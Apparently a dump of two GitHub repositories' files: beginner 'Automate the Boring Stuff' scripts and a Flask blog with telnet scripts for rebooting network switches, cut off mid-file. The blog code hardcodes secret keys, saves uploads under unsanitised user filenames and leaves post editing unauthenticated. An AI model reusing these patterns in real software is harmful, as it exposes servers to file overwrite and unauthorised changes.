"path": "/findPhoneAndEmail.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyperclip, re\n\nphoneReg = re.compile(r'''(\n (\\d{3})\n (\\s|-|\\.)?\n (\\d{3})\n (\\s|-|\\.)?\n (\\d{4})\n )\n ''', re.VERBOSE);\n\nmailReg = re.compile(r'''\n (\\w+?@\\w+?(\\.\\w+) + )\n ''', re.VERBOSE);\n\ns = pyperclip.paste();\n#print(s)\np = phoneReg.findall(s);\nr = [];\n\nfor i in p:\n r.append(\"-\".join([i[1], i[3], i[5]]))\n\ne = mailReg.findall(s);\nfor i in e:\n r.append(i[0]);\n\nres = \"\\n\".join(r);\n#print(p);\n#print(e);\nprint(res)\npyperclip.copy(res);\n\n"
},
{
"alpha_fraction": 0.49499374628067017,
"alphanum_fraction": 0.4981226623058319,
"avg_line_length": 25.616666793823242,
"blob_id": "33300c36395c40b3c8023a8be158f51408ae6c04",
"content_id": "fdd689d048956159c20e9cccafa5fce4fd4d4ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1598,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 60,
"path": "/currentMouse.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui, threading, subprocess\nimport GetCh\nclass ShowCurrentMouse(threading.Thread):\n x = 0;\n y = 0;\n color = ();\n isStop = False;\n def __init__(self):\n super(ShowCurrentMouse, self).__init__();\n self.isStop = False;\n\n def getXY(self):\n return self.x, self.y;\n\n def getColor(self):\n return self.color;\n\n def stop(self):\n self.isStop = True;\n\n def run(self):\n mlen = 0;\n while not self.isStop:\n self.x, self.y = pyautogui.position();\n self.color = pyautogui.pixel(self.x, self.y);\n r, g, b = self.color;\n mess = 'Current Mouse: (%d, %d) color:(%d, %d, %d)'%(self.x,\n self.y,r, g, b);\n print('\\b'*mlen, end='');\n print(mess, end='', flush = True);\n mlen = len(mess);\n\n\ngetch = GetCh.getch;\nmythread = ShowCurrentMouse();\nprint(\"Ctrl - C or e to end.\");\ntry:\n mythread.start();\n f = open('saveMousePosition.txt', 'w');\n f.write(\"mousePos = {\\n\");\n while True:\n a = getch();\n if ord(a) == 3 or a == 'e':#ord(Ctrl - C) = 3.\n raise KeyboardInterrupt;\n break;\n x, y = mythread.getXY();\n r, g, b= mythread.getColor();\n\n mess ='\"' + str(a) + \"\\\" : [(%d, %d),(%d, %d, %d)],\"%(x, y, r, g, b);\n print(\"\\n\" + str(ord(a)) + mess);\n f.write(mess + \"\\n\");\n\n\nexcept KeyboardInterrupt:\n mythread.stop();\n mythread.join();\n f.write(\"\\b\\b}\");\n f.close();\n subprocess.Popen(['cat', 'saveMousePosition.txt']);\n print('\\nexiting...');\n\n"
},
{
"alpha_fraction": 0.5811518430709839,
"alphanum_fraction": 0.6282722353935242,
"avg_line_length": 19.052631378173828,
"blob_id": "59dde60db4a08cf629019c7a9ca5f09fd994f145",
"content_id": "c14882ecd5f5840e7c4f2643ee3dc9366e8b5f13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 19,
"path": "/takeScreenShot.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui\nimport os\nimport GetCh\n\ngetch = GetCh.getch\nif len(os.sys.argv)>1:\n file = os.sys.argv[1];\nelse:\n file = 'screenshot.png'\n\na = getch();\np1= pyautogui.position();\nprint(p1);\na = getch();\np2= pyautogui.position();\nprint(p2);\nb = pyautogui.screenshot('/tmp/tmp.png', (p1[0], p1[1], p2[0] - p1[0], p2[1] - p1[1]));\nprint(\"saving to file:\", file);\nb.save(file);\n\n"
},
{
"alpha_fraction": 0.49837133288383484,
"alphanum_fraction": 0.5048859715461731,
"avg_line_length": 33,
"blob_id": "2a333362337f6b8f81e189a0ff1897faa4359e82",
"content_id": "077ad8df4431433443e5756e0dce37b0dd75de07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/searchFiles.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import os, re\nts = os.sys.argv[1:];\nprint(\"Search files containing %s in %s\"%(','.join(ts), os.getcwd()));\nfor cf, sub, files in os.walk(os.getcwd()):\n for file in files:\n for t in ts:\n if not file.find(t) == - 1:\n f = os.path.join(cf, file);\n print(f);\n\n"
},
{
"alpha_fraction": 0.458083838224411,
"alphanum_fraction": 0.4754491150379181,
"avg_line_length": 26.816667556762695,
"blob_id": "88e7ea45dd4a201dc9c72559f176441d49956539",
"content_id": "1629f51d8be7e0f294eed9ac8959c7caf8c3ae28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1670,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 60,
"path": "/doQuestion.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import urllib3\nimport re\n\ndef doQ(i, an):\n l, r = getQ(i)\n print(\"Test Example\" + str(i) + \":\");\n print(l);\n print(r);\n #reg = re.compile('[A-Z]\\w* Nakamoto');\n reg = an[i];\n print(\"Should pass Cases:\");\n for i in l:\n m = reg.search(i);\n if m is None:\n print(\"fails\");\n else:\n print(m.group());\n\n print(\"Should fail Cases:\");\n for i in r:\n m = reg.search(i);\n if m is None:\n print(\"fails\");\n else:\n print(m.group());\n print();\n\ndef getQ(i):\n url='https://automatetheboringstuff.com/chapter7/'\n http = urllib3.PoolManager()\n data = http.request('GET', url).data;\n res = \"\"\n# r = re.compile(r'Q.*?' + str(i) + \"(. * ?)\" + r'(Q.*?' + str(i +1) + ')|(Practice)');\n r = re.compile(r'Q.+?(' + str(i) + \"\\. (.+?))\" + r'((Q.*?' + str(i +1) +\n ')|(Practice))');\n # r = re.compile(r'src', re.UNICODE)\n # print(str(data));\n res = r.search(str(data)).group(1);\n res = res.replace('\\\\', '');\n r1 = re.compile(r'match the following:(.*?)not the following:(.*)'\n );\n m = r1.search(res);\n r2 = re.compile(r\"'.*?'\");\n l = m.group(1);\n r = m.group(2);\n la = r2.findall(l);\n ra = r2.findall(r);\n la = '|'.join(la).replace('\\'', '').split('|');\n ra = '|'.join(ra).replace('\\'', '').split('|');\n return (la, ra);\n\n#print(data);\nan = [0] * 50;\nan[20] = re.compile(r'^(\\d{1,3}(,\\d{3})*)$');\nan[21] = re.compile(r'([A-Z]\\w* Nakamoto)');\nan[22] = re.compile(r'(Alice|Bob|Carol) (eats|pets|throws) (apples|cats|baseballs)\\.', re.IGNORECASE);\nfor i in range(20, 23):\n doQ(i, an);\n\n#print(q);\n\n"
},
{
"alpha_fraction": 0.6483516693115234,
"alphanum_fraction": 0.6703296899795532,
"avg_line_length": 23.81818199157715,
"blob_id": "d4055920409bb218c9048b7930dffc9a173c37a4",
"content_id": "ae2224f00c952dccd028b2f5ff048ac1597f4499",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 11,
"path": "/detectKey.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\n\ndef onKeyPress(event):\n text.insert('end', \"Pressed %s\\n\"%(event.char, ))\n\nroot = tk.Tk()\nroot.geometry('300x200');\ntext = tk.Text(root, background = 'black', foreground = 'white');\ntext.pack()\nroot.bind('<KeyPress>', onKeyPress);\nroot.mainloop();\n"
},
{
"alpha_fraction": 0.6258503198623657,
"alphanum_fraction": 0.6598639488220215,
"avg_line_length": 23.25,
"blob_id": "b18200069570816c5d95fb8d630c4bcdca6d807a",
"content_id": "35c56d2d6fef50a0e27cbdc30bc48a079f9aa7f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 12,
"path": "/drawText.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "from PIL import Image, ImageDraw, ImageFont\nimport ShowImg;\n\ndef show(i):\n i.save('tmp.png');\n ShowImg.showImg('tmp.png');\n\nimg = Image.new('RGBA', (300, 300), 'blue');\ndraw = ImageDraw.Draw(img);\n#font = ImageFont.truetype(os.path.jogin(\ndraw.text((20, 20), 'hello world')\nshow(img);\n\n\n\n"
},
{
"alpha_fraction": 0.5250995755195618,
"alphanum_fraction": 0.5904382467269897,
"avg_line_length": 35.911766052246094,
"blob_id": "ae0b1c7b27c5a74b3b73042c9304f5298e1e075c",
"content_id": "08c036c3e54e2f3e8e0fc7c4917a009529b16646",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1255,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 34,
"path": "/formFiller.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui, time\nimport webbrowser\nimport locateScreen\n\nmousePos = {\n\"1\" : [(756, 348),(255, 255, 255)],\n\"2\" : [(719, 854),(157, 162, 246)],\n\"3\" : [(822, 252),(255, 255, 255)],\n}\nformData = [\n {'name':'Alic', 'fear':'fuck', 'source':1, 'robocop':1,\n 'comments':'say hi'}];\n\npyautogui.PAUSE = 0.5\nwebbrowser.open('https://docs.google.com/forms/d/1A39NpQYMN8OOG-_lqDLFQb2h1SiHhCxPh0udtDEy2rU/viewform');\np = locateScreen.locate('firefox.png');\nif not p is None:\n pyautogui.doubleClick(p[0], p[1]);\nfor j in range(3):\n for person in formData:\n submit = mousePos[\"2\"];\n while not pyautogui.pixelMatchesColor(submit[0][0], submit[0][1], submit[1]):\n time.sleep(0.5);\n nameFile = mousePos[\"1\"];\n pyautogui.click(nameFile[0][0], nameFile[0][1]);\n pyautogui.typewrite(person['name'] + '\\t');\n pyautogui.typewrite(person['fear'] + '\\t');\n pyautogui.typewrite(['down'] * person['source'] + ['\\t']);\n pyautogui.typewrite(['right'] * person['robocop'] + ['\\t']);\n pyautogui.typewrite(person['comments'] + '\\t');\n pyautogui.press('enter');\n time.sleep(3);\n otherLink = mousePos[\"3\"];\n pyautogui.click(otherLink[0][0], otherLink[0][1]);\n"
},
{
"alpha_fraction": 0.5460420250892639,
"alphanum_fraction": 0.5476574897766113,
"avg_line_length": 23.760000228881836,
"blob_id": "af56e28c0454ef7c96d757c08a67422deda43e80",
"content_id": "9b76c3d2da01daf71460ffe4ecfc80b7d4d0596b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 25,
"path": "/GetCh.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def _find_getch():\n try:\n import termios\n except ImportError:\n # Non - POSIX. Return msvcrt's (Windows')\n # getch.\n import msvcrt\n return msvcrt.getch\n\n # POSIX system. Create and\n # return a getch that\n # manipulates the tty.\n import sys, tty\n def _getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)\n return ch\n\n return _getch\ngetch =_find_getch()\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 35,
"blob_id": "7ef7fe60bd5c373caf26fb1d03f82512389fa838",
"content_id": "c42df05895b4054b3047f62a352cb631422aec73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "###ReadMe\nAll codes are based on http://www.automatetheboringstuff.com\n"
},
{
"alpha_fraction": 0.5246511697769165,
"alphanum_fraction": 0.5720930099487305,
"avg_line_length": 25.875,
"blob_id": "de29a54d3e615d3402a1c120dd10d04eb42e11da",
"content_id": "e1f701d4b9ea15c6840417fcddf311e2776aa280",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 40,
"path": "/spiralPaint.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui, time\nfrom selenium import webdriver\n\nmousePos = {\n \"1\" : (375, 179), \n \"2\" : (386, 242), \n \"3\" : (161, 185), \n \"4\" : (406, 483), \n }\ndef spiralPaint():\n dist = 200;\n de = 5;\n dur = 0.2;\n pyautogui.click()\n while dist>de * 5:\n pyautogui.dragRel(dist, 0, duration = dur);\n dist = dist - de\n pyautogui.dragRel(0, dist, duration = dur);\n dist = dist - de\n pyautogui.dragRel( - dist, 0, duration = dur);\n dist = dist - de\n pyautogui.dragRel(0, - dist, duration = dur);\n dist = dist - de\n\n#\npyautogui.PAUSE = 0.5\npyautogui.FAILSAFE = True\nf = webdriver.Firefox();\nf.maximize_window()\nf.get('http://www.speedpaint.info/');\ndur = 0.25\nprint(\"start painting....\");\ntime.sleep(2);\npyautogui.click( *mousePos[\"1\"], duration = dur);\npyautogui.click( *mousePos[\"2\"], duration = dur);\npyautogui.click( *mousePos[\"3\"], duration = dur);\npyautogui.typewrite(['1', '0']);\npyautogui.click( *mousePos[\"4\"], duration = dur);\n#pyautogui.moveTo();\nspiralPaint();\n"
}
] | 27 |
YatskoGrigoriy/MyFlaskBlog | https://github.com/YatskoGrigoriy/MyFlaskBlog | 0b12f58557e35abb91046721f107747b12c5db8a | c3e7a6adee7296d123c19d13bf2d70c362c4d1c9 | acceb0864db0f56c30f7b9511c09363f83f2b8d3 | refs/heads/master | 2021-06-30T20:20:14.777897 | 2020-03-11T16:17:15 | 2020-03-11T16:17:15 | 235,908,005 | 0 | 0 | null | 2020-01-23T23:38:39 | 2020-01-23T23:58:46 | 2020-01-23T23:59:07 | JavaScript | [
{
"alpha_fraction": 0.5171299576759338,
"alphanum_fraction": 0.7091144323348999,
"avg_line_length": 16.78160858154297,
"blob_id": "3f4a809efcbb119b57deea1bbb49b3f5e318be2b",
"content_id": "8462791f0f8cd7cf3f4723e866760ff4499fab56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1547,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 87,
"path": "/requirements.txt",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "aniso8601==8.0.0\nasn1crypto==0.24.0\nBabel==2.8.0\nbackports.functools-lru-cache==1.6.1\nbackports.shutil-get-terminal-size==1.0.0\nbcrypt==3.1.7\nblinker==1.4\ncertifi==2019.11.28\ncffi==1.13.2\nchardet==3.0.4\nClick==7.0\ncryptography==2.1.4\ncycler==0.10.0\nDateTime==4.3\ndecorator==4.1.2\ndicttoxml==1.7.4\nenum34==1.1.6\nFlask==1.0.3\nFlask-BabelEx==0.9.3\nflask-blueprint==1.3.0\nFlask-CKEditor==0.4.3\nFlask-Login==0.4.1\nFlask-Mail==0.9.1\nflask-marshmallow==0.10.1\nflask-paginate==0.5.5\nFlask-Principal==0.4.0\nFlask-Responses==0.2\nFlask-RESTful==0.3.8\nFlask-Security==3.0.0\nFlask-SQLAlchemy==2.4.1\nFlask-SSLify==0.1.5\nFlask-WTF==0.14.2\nfuture==0.17.1\ngunicorn==19.9.0\nhtml==1.16\nidna==2.8\nipaddress==1.0.17\nipython==5.5.0\nipython-genutils==0.2.0\nitsdangerous==1.1.0\nJinja2==2.10.1\nkeyring==10.6.0\nkeyrings.alt==3.0\nkiwisolver==1.1.0\nMarkupSafe==1.1.1\nmarshmallow==2.20.5\nmatplotlib==2.2.5\nmysql-connector-python==8.0.18\nnumpy==1.16.6\npasslib==1.7.2\npathlib2==2.3.0\npdfkit==0.6.1\npexpect==4.2.1\npickleshare==0.7.4\nply==3.11\nprompt-toolkit==1.0.15\nprotobuf==3.11.1\npyasn1==0.4.8\npycparser==2.19\npycrypto==2.6.1\npycryptodomex==3.9.4\nPygments==2.2.0\npygobject==3.26.1\nPyMySQL==0.9.3\npyparsing==2.4.6\npysmi==0.3.4\npysnmp==4.4.12\npython-dateutil==2.8.1\npytz==2019.3\npyxdg==0.25\nrequests==2.22.0\nscandir==1.7\nSecretStorage==2.3.1\nsimplegeneric==0.8.1\nsix==1.11.0\nspeaklater==1.3\nSQLAlchemy==1.3.11\nsubprocess32==3.5.4\ntk==0.1.0\ntraitlets==4.3.2\nurllib3==1.25.3\nviberbot==1.0.11\nvirtualenv==15.1.0\nwcwidth==0.1.7\nWerkzeug==0.15.4\nWTForms==2.2.1\nzope.interface==4.7.1\n"
},
{
"alpha_fraction": 0.7733563780784607,
"alphanum_fraction": 0.7768166065216064,
"avg_line_length": 27.75,
"blob_id": "d23ae47886ccff02bb3a2d6d1239ca556b351490",
"content_id": "feea23656340a3f57ee554d65b210f66f96fb9ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 578,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 20,
"path": "/app.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom config import Configuration\n\nfrom flask_sslify import SSLify\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_security import Security, SQLAlchemyUserDatastore\napp = Flask(__name__)\nsslify = SSLify(app)\napp.config.from_object(Configuration)\ndb = SQLAlchemy(app)\ncsrf = CSRFProtect(app)\n\n### db = app.config['SQLALCHEMY_DATABASE_URI']\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n### Flask-security\n\nfrom models import *\nuser_datastore = SQLAlchemyUserDatastore(db, User, Role)\nsecurity = Security(app, user_datastore)\n\n\n\n"
},
{
"alpha_fraction": 0.6995708346366882,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 57.25,
"blob_id": "9c2668255df2b94e0978129b1ae0240a8f0d43e3",
"content_id": "fe0223ef1db5de0b89df102d2ba1efacbf7aaf52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 4,
"path": "/run.sh",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\ncd /home/grin/generator/ && gunicorn -w 1 run:app\n"
},
{
"alpha_fraction": 0.4801536500453949,
"alphanum_fraction": 0.4827144742012024,
"avg_line_length": 18.9743595123291,
"blob_id": "9357ff4e6d18b76b2d788d6ad8686798f3118084",
"content_id": "25cd7e56caed6130043f690923397a8be2886a67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 781,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 39,
"path": "/scripts/RebootGroup.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport re\nimport telnetlib\nimport pymysql.cursors\nimport pymysql\n\nuser = '***'\npassword = '***'\n\n\ntry:\n GROUP=(sys.argv[1])\nexcept:\n pass\n\n\ndef db():\n conn = ( pymysql.connect(host = '***',\n user = '***',\n password = '***',\n database = '***',\n charset='utf8' ) )\n\n cursor = conn.cursor()\n cursor.execute('SELECT equipment.ip FROM equipment WHERE equipment.`group` = %s',(GROUP))\n\n user = '***'\n password = '***'\n for data in cursor:\n host = ''.join(data)\n tn = telnetlib.Telnet(host)\n\n tn.write(user + '\\n')\n tn.write(password + '\\n')\n\n tn.write('reboot force_agree\\n')\ndb()\n\n\n"
},
{
"alpha_fraction": 0.48414984345436096,
"alphanum_fraction": 0.5043227672576904,
"avg_line_length": 17.70270347595215,
"blob_id": "f5f3fc1bda4a06a6bd84684bb6f2b9f97d0f2f0f",
"content_id": "d3aaa115fcb974c69b7a71c0b02e4d5f7f3a30f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 694,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 37,
"path": "/scripts/pon.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport re\nimport telnetlib\n\nhost = '10.5.1.2'\n\nuser = '***'\npassword = '***'\n\n\ntry:\n ONU=(sys.argv[1])\n VLAN=(sys.argv[2])\nexcept:\n pass\n\ndef fun():\n\n try:\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('interface epon 0/0\\r\\n')\n tn.write('ont modify 1' + ' ' + ONU + ' ' + 'ont-srvprofile-id ' + ' ' + VLAN + '\\r\\n')\n time.sleep(1)\n r4 = tn.read_very_eager().split('OLT')[6]\n print(r4)\n tn.close()\n except :\n pass\n\nfun()\n\n\n"
},
{
"alpha_fraction": 0.5479452013969421,
"alphanum_fraction": 0.551369845867157,
"avg_line_length": 15.166666984558105,
"blob_id": "d9e543512e59144067a535b3ba9d79d40e80f8d6",
"content_id": "2c1e5cb65ec98aaade4d2936046024a1cf8e2d9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 18,
"path": "/scripts/Reboot.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport telnetlib\n\nIP=(sys.argv[1])\n\ndef reboot(*args):\n user = '***'\n password = '***'\n\n for host in args:\n tn = telnetlib.Telnet(host)\n\n tn.write(user + '\\n')\n tn.write(password + '\\n')\n\n tn.write('reboot force_agree\\n')\nreboot(IP)\n\n"
},
{
"alpha_fraction": 0.6288330554962158,
"alphanum_fraction": 0.6322401762008667,
"avg_line_length": 24.5108699798584,
"blob_id": "7e351692395710bc35b0a1ac5936fee46791003d",
"content_id": "c33850ed77b0ff2293e976d12d4df3b83b1d7cf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4696,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 184,
"path": "/blog/blueprint.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nfrom app import *\nfrom flask import Blueprint, render_template, request, url_for, send_from_directory, redirect, flash, jsonify\nfrom models import Post\nfrom sqlalchemy import asc, desc\nfrom flask_security import login_required\nfrom random import sample\n### Upload_files\n#from flask_ckeditor import CKEditor\nfrom werkzeug.utils import secure_filename\nPOSTS_PER_PAGE = 1\n\n\nposts = Blueprint('posts', __name__, static_folder='fstatic', template_folder='templates')\n\nALLOWED_EXTENSIONS = set(['ico','txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n\n\[email protected]('/imageuploader', methods=['GET','POST'])\ndef imageuploader():\n file = request.files.get('file')\n if file:\n filename = file.filename.lower()\n fn, ext = filename.split('.')\n if ext in ['jpg', 'pdf', 'gif', 'png', 'jpeg']:\n img_fullpath = os.path.join(app.config['BLOG_UPLOAD_FOLDER'], filename)\n # img_fullpath = app.config['BLOG_UPLOAD_FOLDER'] + filename\n print(img_fullpath)\n file.save(img_fullpath)\n return jsonify({'location' : filename})\n\n # fail, image did not upload\n output = make_response(404)\n output.headers['Error'] = 'Image failed to upload'\n return output\n\n\[email protected]('/<path:filename>')\[email protected]('/blog/<path:filename>')\ndef custom_static(filename):\n return send_from_directory('/home/grin/generator/blog/static/files', filename)\n #return send_from_directory(directory=app.config['UPLOAD_FOLDER'], filename=filename)\n\n\[email protected]('/chart')\ndef charts():\n\n return render_template('posts/chart.html')\n\n\[email protected]('/editor')\ndef editor():\n\n return render_template('posts/editor.html')\n\n\n\[email protected]('/data')\ndef data():\n\n return jsonify({'results' : sample(range(1,20),15)})\n\n\n\n\n\[email protected]('/')\ndef allp():\n q = request.args.get('g')\n\n page = request.args.get('page')\n if page and page.isdigit():\n page = int(page)\n else:\n page = 1\n if q:\n posts = Post.query.filter(Post.title.contains(q) | Post.body.contains(q))\n else:\n posts = Post.query.order_by(Post.created.desc())\n\n pages = posts.paginate(page=page, per_page=8)\n # article = Post.query.order_by(desc(Post.created)).paginate(page, POSTS_PER_PAGE, False).items\n\n return render_template('posts/all-posts.html', posts=posts, pages=pages )\n\n\n#Domofon\[email protected]('blog/phone')\ndef phone():\n\n domofon = Post.query.filter(Post.id == '159')\n return render_template('posts/domofon.html', title='Domofon', domofon=domofon)\n\n\n\[email protected]('blog/one-post=<int:id>',methods = ['GET', 'POST'])\n@login_required\ndef ps(id):\n articles = Post.query.filter(Post.id == id)\n\n return render_template('posts/posts.html', articles=articles )\n\n\n\n\[email protected]('/new-post')\ndef newp():\n return render_template('posts/new-post.html')\n\n\n\[email protected](\"/post-add\",methods = ['POST', 'GET'])\ndef padd():\n title = request.form.get('title')\n body = request.form.get('body')\n image = request.form.get('image')\n\n if request.method == 'POST':\n file = request.files['image']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n p = Post(title=title,body=body,image=filename)\n db.session.add(p)\n db.session.commit()\n else:\n p = Post(title=title,body=body)\n db.session.add(p)\n db.session.commit()\n\n\n return 
redirect('/')\n\n\[email protected](\"/blog/edit-post=<int:id>\")\ndef editp(id):\n post = Post.query.filter(Post.id == id)\n return render_template('posts/edit-post.html',post=post)\n\n\n\n\n\n\n\[email protected](\"/blog/post-edit=<int:id>\", methods=['GET', 'POST'])\ndef pedit(id):\n post = Post.query.filter(Post.id == id).first()\n\n if request.method == 'POST':\n title = request.form.get('title')\n body = request.form.get('body')\n image = request.form.get('image')\n file = request.files['image']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n post.image = filename\n else:\n filename = 'Nofile'\n post.title = title\n post.body = body\n db.session.commit()\n\n return redirect('/')\n\n\n\n\n\[email protected](\"/blog/delete-post=<int:id>\")\n@login_required\ndef deletep(id):\n p = Post.query.filter(Post.id == id).delete()\n db.session.commit()\n return redirect('/')\n\n\n"
},
{
"alpha_fraction": 0.6505494713783264,
"alphanum_fraction": 0.6659340858459473,
"avg_line_length": 29.066667556762695,
"blob_id": "5659510394daa5f4e74e5bf7b83828bc72f44a34",
"content_id": "8e21c0e2b5e53d32dc4c37ae10d8c7140815d4b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 455,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/config.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "class Configuration(object):\n DEBUG = True\n UPLOAD_FOLDER = '/home/grin/generator/static/img/blogimgage'\n BLOG_UPLOAD_FOLDER = '/home/grin/generator/blog/static/files/'\n# MYSQL_DATABASE_CHARSET = 'utf8mb4'\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n SQLALCHEMY_DATABASE_URI = '***'\n SECRET_KEY = '12345'\n\n ### Flask-security\n\n SECURITY_PASSWORD_SALT = 'salt'\n SECURITY_PASSWORD_HASH = 'sha256_crypt'\n\n ### Pagination\n \n"
},
{
"alpha_fraction": 0.5934579372406006,
"alphanum_fraction": 0.605140209197998,
"avg_line_length": 17.565217971801758,
"blob_id": "48cf8ad30ba5ac1e048ba1064425a6c4bd11af32",
"content_id": "03b4aa1d59107416cbf0041340a52a78a87185c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 23,
"path": "/scripts/command.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nimport telnetlib\n\nIP=(sys.argv[1])\nCOMMAND=str((sys.argv[2]))\nprint(COMMAND)\n\ndef vg(*args):\n user = '***'\n password = '***'\n tn = telnetlib.Telnet(IP)\n tn.write(user + '\\n')\n tn.write(password + '\\n')\n tn.write('disable clipaging\\n')\n tn.write(COMMAND + '\\n')\n time.sleep(25)\n all_result = tn.read_very_eager().decode('utf-8')\n print(all_result)\n\n\nvg(IP,COMMAND)\n\n"
},
{
"alpha_fraction": 0.5594294667243958,
"alphanum_fraction": 0.580824077129364,
"avg_line_length": 21.105262756347656,
"blob_id": "416fd49356b05a77e86ac050c0243c8b205db36e",
"content_id": "a17ff8eb486fb9871862721f353aefceacbe2e61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1262,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 57,
"path": "/scripts/olt.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
